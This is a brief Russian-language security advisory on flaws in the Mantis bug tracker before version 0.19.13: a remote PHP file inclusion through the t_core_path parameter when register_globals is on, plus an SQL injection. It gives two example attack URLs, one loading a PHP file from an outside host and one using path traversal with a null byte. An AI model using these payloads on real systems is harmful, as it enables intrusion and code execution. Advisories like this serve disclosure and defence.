Программа: Mantis версии до 0.19.13
Обнаруженные уязвимости позволяют
удаленному пользователю произвести SQL-инъекцию
и выполнить произвольные команды на
системе.
1. Уязвимость существует при обработке
входных данных в параметре t_core_path в
сценарии bug_sponsorship_list_view_inc.php. Удаленный
пользователь может с помощью специально
сформированного URL выполнить произвольный
PHP сценарий на целевой системе. Для успешной
эксплуатации уязвимости должна быть
включена опция register_globals.
Пример:
http://[host]/bug_sponsorship_list_view_inc.php? t_core_path=http://[host]/[file].php?
http://[host]/bug_sponsorship_list_view_inc.php? t_core_path=../../../../../../../[file]%00
2. SQL-инъекция возможна из-за недостаточной
обработки входных данных в некоторых
параметрах. Удаленный пользователь может с
помощью специально сформированного
запроса выполнить произвольные SQL команды
на целевой системе.